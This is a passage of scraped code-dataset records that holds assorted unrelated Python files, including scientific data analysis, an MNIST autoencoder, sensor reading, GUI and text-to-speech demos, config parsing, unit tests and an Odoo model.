#input: clustering results .txt\r\n #output: dictionary with CloneID and cluster number\r\n \r\n #open the text file, read it in line by line and close it\r\n f = open(tekstbestand, \"r\")\r\n clusterresultlines = f.read().splitlines()\r\n f.close()\r\n \r\n #create an empty dictionary\r\n clusterresultdict = {}\r\n #each line is split on 3 spaces, so they can be added to the dictionary as key:value\r\n for i in clusterresultlines:\r\n linesplit= i.split(\" \")\r\n clusterresultdict[linesplit[0]]=linesplit[1]\r\n \r\n return clusterresultdict\r\nresultladen(\"Voorbeeld_clusterresult.txt\")\r\n\r\ndef ESTs(df_clusterdata, dictGenDes):\r\n df_clusterdata['Description'] = df_clusterdata.CloneID.replace(dictGenDes)\r\n \r\n df_ESTs = df_clusterdata.loc[df_clusterdata['Description'] == 'ESTs']\r\n df_ESTs = df_ESTs[['CloneID', 'cluster_nummer', 'Description']]\r\n grouped_EST = 
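A minimal usage sketch for the `DataIterator` class from the dataloader.py record above, with dummy arrays (the shapes are illustrative; real text/mel/mag tensors come from the preprocessing pipeline):

```python
# Illustrative-only shapes; DataIterator reshuffles all four arrays in step
# once the pointer wraps past the number of examples.
import numpy as np

text = np.zeros((10, 50), dtype=np.int32)       # 10 examples, 50 char ids each
text_len = np.full((10,), 50, dtype=np.int32)
mel = np.zeros((10, 200, 80), dtype=np.float32)
mag = np.zeros((10, 200, 513), dtype=np.float32)

it = DataIterator(text, text_len, mel, mag, batch_size=4)
for batch_text, batch_len, batch_mel, batch_mag in it.iterate():
    print(batch_text.shape)  # (4, 50)
```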
df_ESTs.groupby(['cluster_nummer', 'Description']).size()\r\n grouped_EST = grouped_EST.to_frame() \r\n grouped_EST = grouped_EST.rename(columns={0:'count'})\r\n grouped_EST = grouped_EST.reset_index()\r\n \r\n my_colors = list('rgbkymc')\r\n ax = grouped_EST.plot.bar(x='cluster_nummer', y='count', rot=0, color=my_colors)\r\n ax.set_xlabel('Cluster number')\r\n ax.set_ylabel('Number of genes with an EST in the cluster')\r\n ax.get_legend().remove()\r\n plt.tight_layout()\r\n","sub_path":"EST.py","file_name":"EST.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"23003731","text":"import h5py\nimport numpy as np\nfrom model import *\nimport argparse\nparser = argparse.ArgumentParser(description='Multi-layer perceptron')\n\nparser.add_argument('--layers', nargs='+', type=int,default=[784,512,256,128,256,512,784])\nparser.add_argument('--epochs', type=int,default=2000)\nparser.add_argument('--batch_size', type=int,default=256)\nparser.add_argument('--resume', type=int,default=-1)\nargs = parser.parse_args()\nprint(args)\ndef lr(epoch): # learning rate scheduler\n\tif epoch in range(0,500):\n\t\treturn 0.01\n\telif epoch in range(500,1000):\n\t\treturn 0.001\n\telse:\n\t\treturn 0.0001\nMNIST_data = h5py.File(\"../mnist.hdf5\", 'r') # load data\n\nx_train = np.float32(MNIST_data['x_train'][:])\nprint(x_train.shape)\nx_test = np.float32(MNIST_data['x_train'][:256])\nMNIST_data.close()\n\ntest = x_test.reshape(-1,28,28,1)*255. # test images\nsave_image(16,16,test,'./original.png')\n\nbatch_size=args.batch_size\nepochs=args.epochs\nmodel = Model([784,512,256,128,256,512,784])\nif args.resume >=0: # load pretrained model\n\tckpt = np.load('./weights/{}.npy'.format(args.resume),allow_pickle=True).item()\n\tmodel.weights = ckpt['weights']\n\tmodel.biases = ckpt['biases']\nfor i in range(epochs):\n\tavg_loss = 0.\n\tfor j in range(0,len(x_train),batch_size): # sample batch\n\t\tbatch = x_train[j:j+batch_size,:].transpose() if j+batch_size <= len(x_train) else x_train[j:,:].transpose()\n\t\tloss = model.update(batch,batch,lr(i))\n\t\tavg_loss += loss\n\n\tx_test_r = model.predict(x_test.transpose()).transpose()\n\ttest_r = x_test_r.reshape(-1,28,28,1)*255.\n\tsave_image(16,16,test_r,'./reconstructed.png') # reconstruct images for evaluation\n\tprint('Epoch {}, Loss : {:.3f}'.format(i,avg_loss/len(x_train)))\n\tif i%50 ==0 or i == epochs-1: # save weights\n\t\tnp.save('./weights/{}.npy'.format(i),{'weights': model.weights, 'biases': model.biases})","sub_path":"RL/CS17BTECH11029_HW2/Q2/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"626442547","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os,sys\n# add ../../Sources to the PYTHONPATH\nsys.path.append(os.path.join(\"..\",\"..\",\"Sources\"))\nfrom yoctopuce.yocto_api import *\nfrom yoctopuce.yocto_humidity import *\nfrom yoctopuce.yocto_temperature import *\nfrom yoctopuce.yocto_pressure import *\n\ndef usage():\n scriptname = os.path.basename(sys.argv[0])\n print(\"Usage:\")\n print(scriptname+' ')\n print(scriptname+' ')\n print(scriptname+' any ')\n sys.exit()\n\ndef die(msg):\n sys.exit(msg+' (check USB cable)')\n\nerrmsg=YRefParam()\n\nif len(sys.argv)<2 : usage()\n\ntarget=sys.argv[1]\n\n# Setup the API to use local USB devices\nif YAPI.RegisterHub(\"usb\", errmsg) != YAPI.SUCCESS:\n sys.exit(\"init 
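On the `--resume` checkpointing in q2.py above: `np.save()` can persist a plain dict of arrays, and `np.load(..., allow_pickle=True).item()` restores it. A tiny sketch of that round trip (the path is arbitrary):

```python
# Checkpoint pattern from q2.py, in isolation.
import numpy as np

ckpt = {'weights': [np.ones((2, 2))], 'biases': [np.zeros(2)]}
np.save('/tmp/0.npy', ckpt)

restored = np.load('/tmp/0.npy', allow_pickle=True).item()
assert np.array_equal(restored['weights'][0], ckpt['weights'][0])
```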
error\"+errmsg.value)\n\nif target=='any':\n # retreive any humidity sensor\n sensor = YHumidity.FirstHumidity()\n if sensor is None :\n die('No module connected')\n m = sensor.get_module()\n target = m.get_serialNumber()\n\nelse:\n m = YModule.FindModule(target)\n\nif not m.isOnline() : die('device not connected')\n\nhumSensor = YHumidity.FindHumidity(target+'.humidity')\npressSensor = YPressure.FindPressure(target+'.pressure')\ntempSensor = YTemperature.FindTemperature(target+'.temperature')\n\n\nwhile True:\n print('%4.2f' % tempSensor.get_currentValue()+\"°C \"\\\n + \"%6.1f\" % pressSensor.get_currentValue()+\"mb \"\\\n + \"%4.1f\" % humSensor.get_currentValue()+\"% (Ctrl-c to stop) \")\n YAPI.Sleep(1000)\n","sub_path":"yocto_meteo.py","file_name":"yocto_meteo.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"461512814","text":"import pyttsx3\nfrom playsound import playsound\n\nengine = pyttsx3.init()\nvoices = engine.getProperty(\"voices\")\ntext = \"Mic testing 1 2 3\"\nengine.setProperty(\"rate\", 200)\nengine.setProperty(\"voice\", voices[1].id) #voices[1] is for female voice and voice[0] is for male voice\n\nengine.say(text)\nengine.runAndWait()\n","sub_path":"Python/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"649025640","text":"#\n# Copyright (C) 2013 - 2015 Satoru SATOH \n# License: MIT\n#\n\"\"\"configobj backend.\n\n- Format to support: configobj, http://goo.gl/JbP2Kp (readthedocs.org)\n- Requirements: configobj (https://pypi.python.org/pypi/configobj/)\n- Limitations: None obvious\n- Special options:\n\n - All options except for 'infile' passed to configobj.ConfigObj.__init__\n should work.\n\n - See also: http://goo.gl/LcVOzZ (readthedocs.org)\n\"\"\"\nfrom __future__ import absolute_import\n\nimport configobj\nimport anyconfig.backend.base\n\n\nclass Parser(anyconfig.backend.base.Parser):\n \"\"\"\n Parser for Ini-like config files which configobj supports.\n \"\"\"\n _type = \"configobj\"\n _priority = 10\n _load_opts = [\"cls\", \"configspec\", \"encoding\", \"interpolation\",\n \"raise_errors\", \"list_values\", \"create_empty\", \"file_error\",\n \"stringify\", \"indent_type\", \"default_encoding\", \"unrepr\",\n \"_inspec\", ]\n _dump_opts = [\"cls\", \"encoding\", \"list_values\", \"indent_type\",\n \"default_encoding\", \"unrepr\", \"write_empty_values\", ]\n\n @classmethod\n def load_impl(cls, config_fp, **kwargs):\n \"\"\"\n :param config_fp: Config file object\n :param kwargs: backend-specific optional keyword parameters :: dict\n\n :return: dict object holding config parameters\n \"\"\"\n return configobj.ConfigObj(config_fp, **kwargs)\n\n @classmethod\n def dumps_impl(cls, data, **kwargs):\n \"\"\"\n :param data: Data to dump :: dict\n :param kwargs: backend-specific optional keyword parameters :: dict\n\n :return: string represents the configuration\n \"\"\"\n conf = configobj.ConfigObj(**kwargs)\n conf.update(data)\n conf.filename = None\n\n return '\\n'.join(conf.write())\n\n @classmethod\n def dump_impl(cls, data, config_path, **kwargs):\n \"\"\"\n :param data: Data to dump :: dict\n :param config_path: Dump destination file path\n :param kwargs: backend-specific optional keyword parameters :: dict\n \"\"\"\n conf = configobj.ConfigObj(**kwargs)\n conf.update(data)\n\n conf.write(open(config_path, 'wb'))\n\n# 
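A round-trip sketch for the configobj backend above, assuming the configobj package is installed: `ConfigObj` is both the parser and the writer, and `write()` returns a list of lines when no filename is attached, which is what `dumps_impl` exploits:

```python
# Minimal dumps-style usage mirroring dumps_impl above.
import configobj

conf = configobj.ConfigObj()
conf.update({'section': {'key': 'value'}})
conf.filename = None
text = '\n'.join(conf.write())
print(text)  # "[section]" followed by "key = value" (exact indentation depends on indent_type)
```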
vim:sw=4:ts=4:et:\n","sub_path":"anyconfig/backend/configobj.py","file_name":"configobj.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"596634882","text":"import sys\nfrom PyQt5.QtWidgets import QMainWindow,QApplication,QPushButton,QHBoxLayout,QWidget\n\ndef ButtonOnClick():\n print('Button clicked!')\n\n # print(\"widget.x() = %d\" % widget.x()) # window abscissa\n # print(\"widget.y() = %d\" % widget.y()) # window ordinate\n # print(\"widget.width() = %d\" % widget.width()) # Workspace width\n # print(\"widget.height() = %d\" % widget.height()) # Workspace heignt\n '''\n widget.x() = 260\n widget.y() = 200\n widget.width() = 300\n widget.height() = 240\n '''\n\n # print(\"widget.geometry().x() = %d\" % widget.geometry().x()) # Workspace abscissa\n # print(\"widget.geometry().y() = %d\" % widget.geometry().y()) # Workspace ordinate\n # print(\"widget.geometry().width() = %d\" % widget.geometry().width()) # Workspace width\n # print(\"widget.geometry().height() = %d\" % widget.geometry().height()) # Workspace heignt\n '''\n widget.geometry().x() = 261\n widget.geometry().y() = 238\n widget.geometry().width() = 300\n widget.geometry().height() = 240\n '''\n print(\"widget.frameGeometry().x() = %d\" % widget.frameGeometry().x()) # window abscissa\n print(\"widget.frameGeometry().y() = %d\" % widget.frameGeometry().y()) # window ordinate\n print(\"widget.frameGeometry().width() = %d\" % widget.frameGeometry().width() ) # window width\n print(\"widget.frameGeometry().height() = %d\" % widget.frameGeometry().height()) # window heignt\n\n\napp = QApplication(sys.argv)\n\nwidget = QWidget()\nbutton = QPushButton(widget)\nbutton.setText('Push')\nbutton.clicked.connect(ButtonOnClick)\n\n# set function erea size\nwidget.resize(300,240)\nwidget.move(260,200)\nwidget.setWindowTitle('Geometry')\n\nbutton.move(130,110)\n\nwidget.show()\nsys.exit(app.exec_())","sub_path":"p023/screen_geometry.py","file_name":"screen_geometry.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3772751","text":"__author__ = 'theid'\nfrom km3pipe import Module, Blob, constants\nimport ROOT\n\n\nclass AdditionalROOTFile(Module):\n def __init__(self, **context):\n super(self.__class__, self).__init__(**context)\n self.file_name = self.get(\"filename\")\n self.additionalFile = ROOT.TFile(self.file_name)\n self.tree_name = self.get(\"treename\")\n self.true_tree = self.additionalFile.Get(self.tree_name)\n self.run_id = self.get(\"runId\")\n self.tree = self.true_tree.CopyTree(\"run==\"+str(self.run_id))\n self.maximum_number_of_events = self.tree.GetEntries()\n\n\n\n #self.storage = Functions.GenerateStorage(self.tree.GetListOfBranches(), self.tree)\n #Functions.SetBranchAddresses(self.storage, self.tree)\n\n self.numberOfEvents = self.tree.GetEntries()\n self.currentEvent = -1\n\n self.Counter = 0\n self.Tested = 0\n self.lastRootEventCount = -1\n\n def process(self, blob):\n self.Tested += 1\n eventId = blob['Evt'].id\n\n if self.storage[\"ev\"][0] == eventId:\n self.prepareBlob(blob)\n return blob\n\n else:\n previous_event_id = -1\n while self.storage[\"ev\"][0] < eventId:\n if self.storage[\"ev\"][0] == previous_event_id:\n break\n previous_event_id = self.storage[\"ev\"][0]\n self.lastRootEventCount += 1\n self.tree.GetEntry(self.lastRootEventCount)\n if self.storage[\"ev\"][0] == eventId:\n self.prepareBlob(blob)\n return 
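The `process()` loop in `AdditionalROOTFile` above advances through the ROOT tree until its event id catches up with the blob's id. A dependency-free sketch of that alignment, with plain lists standing in for the tree (the function and names here are illustrative, not part of km3pipe):

```python
def align(blob_event_ids, tree_event_ids):
    """Yield (blob_id, tree_index) pairs where ids match; both inputs sorted."""
    tree_pos = 0
    for blob_id in blob_event_ids:
        # skip tree entries whose id is still behind the current blob
        while tree_pos < len(tree_event_ids) and tree_event_ids[tree_pos] < blob_id:
            tree_pos += 1
        if tree_pos < len(tree_event_ids) and tree_event_ids[tree_pos] == blob_id:
            yield blob_id, tree_pos

assert list(align([2, 5, 7], [1, 2, 3, 5, 9])) == [(2, 1), (5, 3)]
```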
blob\n\n def prepareBlob(self, blob):\n blob['storage'] = self.storage\n self.Counter += 1\n\n def finish(self):\n print(self.Counter)\n\n\nclass ReadMCValues(Module):\n def __init__(self, **context):\n super(self.__class__, self).__init__(**context)\n\n def process(self, blob):\n blob[\"AdditionalMCValues\"] = {}\n blob[\"AdditionalMCValues\"][\"taulength\"] = blob['Evt'].mc_trks[1].len\n blob[\"AdditionalMCValues\"][\"cc\"] = blob['Evt'].mc_trks[0].usr[0]\n blob[\"AdditionalMCValues\"][\"by\"] = blob['Evt'].mc_trks[0].usr[1]\n blob[\"AdditionalMCValues\"][\"ichan\"] = blob['Evt'].mc_trks[0].usr[2]\n\n return blob\n","sub_path":"AdditionalInformation.py","file_name":"AdditionalInformation.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395830533","text":"import pdb\n\"\"\"\nCreated on Tue Jun 3 11:32:19 2014\n\n@author: rkp\n\nCalculate a covariance matrix of all (normalized) dynamical quantities.\n\"\"\"\n\nimport pickle\n\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib.cm as cm\n\nSPEED_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_speed.pickle'\nVEL_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_velocity.pickle'\nACC_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_acceleration.pickle'\nANG_VEL_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_ang_velocity.pickle'\nANG_ACC_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_ang_acceleration.pickle'\nTICK_LABELS = ['S','Vx','Vy','Vz','Ax','Ay','Az','Wx','Wy','Wz','ax','ay','az']\n\ndef calc(speed_file=SPEED_FILE,vel_file=VEL_FILE,acc_file=ACC_FILE,ang_vel_file=ANG_VEL_FILE,\n ang_acc_file=ANG_ACC_FILE,tick_labels=TICK_LABELS):\n \"\"\"Calculate the covariance matrix of the data in all the files.\"\"\"\n \n with open(speed_file) as f:\n S = pickle.load(f)['data']\n # Make a big matrix\n S = np.concatenate([S[key] for key in np.sort(S.keys())],0)\n S = S[:,np.newaxis]\n with open(vel_file) as f:\n V = pickle.load(f)['data']\n V = np.concatenate([V[key] for key in np.sort(V.keys())],0)\n with open(acc_file) as f:\n A = pickle.load(f)['data']\n A = np.concatenate([A[key] for key in np.sort(A.keys())],0)\n with open(ang_vel_file) as f:\n W = pickle.load(f)['data']\n W = np.concatenate([W[key] for key in np.sort(W.keys())],0)\n with open(ang_acc_file) as f:\n AA = pickle.load(f)['data']\n AA = np.concatenate([AA[key] for key in np.sort(AA.keys())],0)\n \n # Make full data matrix\n D = np.concatenate([S,V,A,W,AA],1)\n # Normalize data matrix\n D /= D.std(0)\n \n C = np.cov(D.T)\n \n fig = plt.figure(facecolor='w')\n ax = fig.add_subplot(111)\n ax.set_xticks(np.arange(0,13))\n ax.set_xticklabels(tick_labels)\n ax.set_yticks(np.arange(0,13))\n ax.set_yticklabels(tick_labels)\n ax.set_title('Data covariance')\n \n cax = ax.imshow(C,interpolation='nearest',cmap = cm.jet)\n cbar = fig.colorbar(cax)\n \n return C\n \nif __name__ == '__main__':\n calc()","sub_path":"wind_tunnel/old/stats/cov/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184084121","text":"# Definition for singly-linked list.\nclass ListNode(object):\n\n def __init__(self, x):\n self.val 
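Because the covariance script above divides every column by its standard deviation before calling `np.cov`, the result is effectively a correlation matrix with (approximately) ones on the diagonal. A tiny numeric check of that fact:

```python
# Standardized columns => np.cov produces a correlation-like matrix.
import numpy as np

D = np.random.randn(1000, 3)
D[:, 1] += 0.8 * D[:, 0]   # make two columns correlated
D = D / D.std(0)           # same normalization as the script

C = np.cov(D.T)
assert np.allclose(np.diag(C), 1.0, atol=0.05)
print(C[0, 1])             # noticeably positive for the correlated pair
```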
= x\n self.next = None\n\n# Definition for a binary tree node.\n\n\nclass TreeNode(object):\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n\n def BuildBinaryTree(self, node, val):\n if node.val > val:\n if not node.left:\n node.left = TreeNode(val)\n else:\n self.BuildBinaryTree(node.left, val)\n\n if node.val < val:\n if not node.right:\n node.right = TreeNode(val)\n else:\n self.BuildBinaryTree(node.right, val)\n\n\n def sortedListToBST(self, head):\n \tif not head:\n \t\treturn None\n \t# slow/fast pointers find the middle node, which becomes the root\n \tslow, fast = head, head\n\n \twhile fast and fast.next:\n \t\tfast = fast.next.next\n \t\tslow = slow.next\n\n \ttreeNodeHead = TreeNode(slow.val)\n\n \t# insert every other value into the BST rooted at the middle node\n \t# (values equal to an existing node are skipped by BuildBinaryTree)\n \tnode = head\n \twhile node:\n \t\tif node is not slow:\n \t\t\tself.BuildBinaryTree(treeNodeHead, node.val)\n \t\tnode = node.next\n \treturn treeNodeHead\n","sub_path":"109-convert-sorted-list-to-binary-search-tree/109.py","file_name":"109.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"390373040","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This file is part of visvalingamwyatt.\n# https://github.com/fitnr/visvalingamwyatt\n\n# Licensed under the MIT license:\n# http://www.opensource.org/licenses/MIT-license\n# Copyright (c) 2015, fitnr \nimport os\nimport json\nimport unittest\nfrom collections import namedtuple\nimport numpy as np\nimport visvalingamwyatt as vw\nfrom visvalingamwyatt import __main__ as cli\n\nclass TestCase(unittest.TestCase):\n\n def setUp(self):\n with open('tests/data/sample.json') as f:\n self.fixture = json.load(f).get('features')[0]\n\n def standard(self, **kwargs):\n result = vw.simplify_feature(self.fixture, **kwargs)\n\n assert 'geometry' in result\n assert 'properties' in result\n assert result['properties'] == self.fixture['properties']\n assert self.fixture['geometry']['type'] == result['geometry']['type']\n assert self.fixture['geometry']['coordinates'][0] == result['geometry']['coordinates'][0]\n\n assert len(self.fixture['geometry']['coordinates']) > len(result['geometry']['coordinates'])\n\n return result\n\n def testSimplifyFeature(self):\n self.standard()\n\n def testSimplifyFeatureThreshold(self):\n self.standard(threshold=0.1)\n\n def testSimplifyFeatureRatio(self):\n result = self.standard(ratio=0.1)\n\n b = vw.simplify_feature(self.fixture, ratio=0.90)\n assert len(b['geometry']['coordinates']) > len(result['geometry']['coordinates'])\n for i, j in zip(range(1, 9), range(2, 10)):\n r = vw.simplify_feature(self.fixture, ratio=float(i) / 10)\n s = vw.simplify_feature(self.fixture, ratio=float(j) / 10)\n assert len(r['geometry']['coordinates']) <= len(s['geometry']['coordinates'])\n\n def testSimplifyFeatureNumber(self):\n result = self.standard(number=10)\n self.assertEqual(len(result['geometry']['coordinates']), 10)\n\n def test3dCoords(self):\n coordinates = [[0.0, 0.0, 0.0], [1.1, 0, 1], [2.1, 3, 0], [4.1, 5, 10], [1.1, 2, 0], [5.1, 2, 0]]\n a = vw.simplify(coordinates)\n self.assertEqual(a[0], [0, 0, 0])\n self.assertLessEqual(len(a), len(coordinates))\n\n def testSimplifyTupleLike(self):\n Point = namedtuple(\"Point\", (\"x\", \"y\"))\n\n # coordinates are in the shape\n #\n # c\n # b d\n # a e\n #\n # so b and d are eliminated\n\n a, b, c, d, e = Point(0, 0), Point(1, 1), Point(2, 2), Point(3, 1), Point(4, 0)\n inp = [a, b, c, d, e]\n expected_output = np.array([a, c, e])\n\n actual_output = vw.simplify(inp, threshold=0.001)\n self.assertTrue(np.array_equal(actual_output, 
expected_output))\n\n def testSimplifyIntegerCoords(self):\n # coordinates are in the shape\n #\n # c\n # b d\n # a e\n #\n # so b and d are eliminated\n\n a, b, c, d, e = (0, 0), (1, 1), (2, 2), (3, 1), (4, 0)\n inp = [a, b, c, d, e]\n expected_output = np.array([a, c, e])\n\n actual_output = vw.simplify(inp, threshold=0.001)\n self.assertTrue(np.array_equal(actual_output, expected_output))\n\n def testCli(self):\n pass\n\n def testSimplify(self):\n try:\n output = 'tmp.json'\n cli.simplify('tests/data/sample.json', output, number=9)\n\n self.assertTrue(os.path.exists(output))\n\n with open('tmp.json', 'r') as f:\n result = json.load(f)\n coords = result['features'][0]['geometry']['coordinates']\n self.assertEqual(len(coords), 9)\n\n finally:\n os.remove(output)\n","sub_path":"tests/test_vw.py","file_name":"test_vw.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"569628598","text":"import csv\nD = {}\ninFile = open('/mnt/larsix/projects/NMD/hansun/Data/DrugBank/all.csv')\ninFile = csv.reader(inFile)\nfor line in inFile:\n gene = line[2]\n drug = line[12:]\n for dg in drug:\n if dg:\n dgs = dg.split(';')\n for x in dgs:\n x = x.strip()\n if x:\n D.setdefault(gene, [])\n D[gene].append(x)\nouFile = open('DrugBank_Gene_Drugs', 'w')\nfor k in D:\n if k:\n ouFile.write(k + '\\t' + k.upper() + '\\t' + '\\t'.join(D[k]) + '\\n')\nouFile.close()\n","sub_path":"Data/DrugBank/01-DrugBank.py","file_name":"01-DrugBank.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595208745","text":"from os import walk\nfrom pathlib import Path\nfrom typing import List, Dict\nfrom urllib.request import urlretrieve\n\nimport pandas as pd\n\nimport settings\n\n\ndef remove_file(path):\n Path(path).unlink()\n\n\ndef download_file_from_url(url, fpath):\n urlretrieve(url, fpath)\n return fpath\n\n\ndef list_files(dirpath: str, pattern: str = \"*\") -> List:\n _, _, filenames = next(walk(dirpath))\n files = [\n Path(dirpath).joinpath(filename)\n for filename in filenames\n if Path(dirpath).joinpath(filename).match(pattern)\n ]\n files.sort(key=(lambda x: -x.stat().st_mtime))\n return files\n\n\ndef find_file(folder: str, pattern: str):\n return list_files(folder, pattern)[0]\n\n\ndef serie_to_lowercase(df: pd.DataFrame, cols: List[str]):\n for col in cols:\n df[col] = df[col].apply(\n lambda x: x.lower().strip() if isinstance(x, str) else x\n )\n\n\ndef get_exposition_level(nb: int, **kwargs) -> int:\n type = kwargs[\"type\"]\n return (\n max(settings.EXPOSITION[type].items(), key=lambda y: nb <= y[0])[1]\n if nb <= list(settings.EXPOSITION[type])[-1]\n else 5\n )\n\n\ndef print_row(x):\n print(x)\n\n\ndef mapSexeToCode(x):\n m = {\"Hommes\": 1, \"Femmes\": 2}\n return m[x]\n\n\ndef load_excel_to_df(_settings: Dict, path=None) -> pd.DataFrame:\n fpath = (\n find_file(settings.DATA_FOLDER, _settings[\"source\"][\"pattern\"])\n if not path\n else path\n )\n # fix bug in pandas when setting type for index (see https://github.com/pandas-dev/pandas/issues/35816)\n read_excel_settings = _settings[\"read_excel\"]\n index_col = read_excel_settings.get(\"index_col\")\n dtype = read_excel_settings.get(\"dtype\")\n cast_str_index = False\n if index_col and dtype and dtype[index_col] == str:\n cast_str_index = True\n if cast_str_index:\n del read_excel_settings[\"index_col\"]\n args = {**{\"io\": fpath}, **read_excel_settings}\n df = 
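A quick usage sketch matching the integer-coordinate test in the visvalingamwyatt suite above: points b and d of the triangle contribute the least effective area, so the Visvalingam-Whyatt pass removes them.

```python
# Mirrors testSimplifyIntegerCoords; vw.simplify returns an array-like result.
import visvalingamwyatt as vw

points = [(0, 0), (1, 1), (2, 2), (3, 1), (4, 0)]
print(vw.simplify(points, threshold=0.001))  # keeps a, c, e: [[0 0] [2 2] [4 0]]
```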
pd.read_excel(**args)\n if cast_str_index:\n df.set_index(index_col, drop=True, inplace=True)\n return df\n\n\ndef load_csv_to_df(_settings: Dict, path=None) -> pd.DataFrame:\n fpath = (\n find_file(settings.DATA_FOLDER, _settings[\"source\"][\"pattern\"])\n if not path\n else path\n )\n # fix bug in pandas when setting type for index (see https://github.com/pandas-dev/pandas/issues/35816)\n read_csv_settings = _settings[\"read_csv\"]\n index_col = read_csv_settings.get(\"index_col\")\n dtype = read_csv_settings.get(\"dtype\")\n cast_str_index = False\n if index_col and dtype and dtype[index_col] == str:\n cast_str_index = True\n if cast_str_index:\n del read_csv_settings[\"index_col\"]\n args = {**{\"filepath_or_buffer\": fpath}, **read_csv_settings}\n df = pd.read_csv(**args)\n if cast_str_index:\n df.set_index(index_col, drop=True, inplace=True)\n return df\n\n\ndef filter_row_low_value(row, **kwargs):\n cols = kwargs[\"cols\"]\n for col in cols:\n if row[col] < settings.FILTER_THREESHOLD:\n row[col] = None\n return row\n\n\ndef filter_df_on_low_values(df: pd.DataFrame, cols: List) -> pd.DataFrame:\n return df.apply(axis=1, func=filter_row_low_value, cols=cols)\n\n\ndef filter_serie_on_low_values(serie: pd.Series) -> pd.Series:\n return serie.transform(lambda x: x if x >= settings.FILTER_THREESHOLD else None)\n\n\ndef get_total_exposition_level(serie: pd.Series, type: str) -> int:\n return get_exposition_level(serie.sum() / serie.size, type=type)\n","sub_path":"create_database/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"249237744","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, exceptions\n\n \nclass Activity(models.Model):\n _name = \"proyectosge.activity\"\n \n date = fields.Date(default=fields.Date.today)\n description = fields.Char(required=True)\n duration = fields.Float(digits=(2,1), help=\"Duration in hours\")\n remarks = fields.Text(required=True)\n \n owner = fields.Many2one('res.users', string=\"Pupil\",default=lambda self: self.env.user,readonly=True)\n \n\n @api.constrains('duration')\n def _check_duration_not_too_long(self):\n for r in self:\n if r.duration > 8:\n raise exceptions.ValidationError(\"An activity cannot be longer than 8 hours\")\n \n @api.constrains('duration')\n def _check_duration_not_too_short(self):\n for r in self:\n if r.duration < 0:\n raise exceptions.ValidationError(\"An activity cannot be shorter than 0 hours\")\n \n @api.constrains('duration')\n def _check_total_duration(self):\n total_duration = 0\n for activity in self.search([('owner','=',self.owner.id)]):\n total_duration = total_duration + activity.duration\n if total_duration > 350:\n raise exceptions.ValidationError('Maximum duration of all the activities cannot be more than 350 hours.')\n \n @api.constrains('duration')\n def _check_day_duration(self):\n day_duration = 0\n for activity in self.search([('date','=',self.date)]):\n day_duration = day_duration + activity.duration\n if day_duration > 8:\n raise exceptions.ValidationError('Maximum duration per day cannot be more than 8 hours.')\n# \n \n \n\n\n","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"135134809","text":"# third-party imports\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required, 
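The pandas workaround commented in helpers.py above (GH #35816) can be shown on its own: read without `index_col` so the `dtype={index: str}` mapping is honored, then set the index afterwards. A self-contained sketch:

```python
# Standalone illustration of the str-index workaround from helpers.py.
import io
import pandas as pd

csv = io.StringIO("code,value\n01,10\n02,20\n")
df = pd.read_csv(csv, dtype={"code": str})   # keep leading zeros in "code"
df = df.set_index("code", drop=True)
assert list(df.index) == ["01", "02"]
```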
